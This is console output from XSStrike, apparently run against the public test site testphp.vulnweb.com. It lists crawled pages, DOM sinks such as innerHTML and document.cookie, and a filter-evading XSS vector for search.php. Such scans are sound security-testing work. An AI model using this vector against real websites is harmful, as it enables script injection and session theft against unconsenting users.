
	XSStrike v3.1.5

 Crawling the target 
 Parsing                                           Parsing AJAX/index.php                            Parsing userinfo.php                              Parsing hpp/                                      Parsing artists.php                               Parsing categories.php                            Parsing login.php                                 Parsing cart.php                                  Parsing guestbook.php                             Potentially vulnerable objects found at http://testphp.vulnweb.com/AJAX/index.php 
------------------------------------------------------------
14  		*cd.innerHTML* = inner;17  		*id.innerHTML* = '';44  		*id.innerHTML* = inner;77  			*xd.innerHTML* = httpreq.responseText;109 		*document.cookie* = "mycookie=3";------------------------------------------------------------
[++] Vulnerable webpage: http://testphp.vulnweb.com/search.php?test=query 
[++] Vector for searchFor: <Html%09onPoInterEntER%09=%09confirm()%0dx// 
 Progress: 9/9 
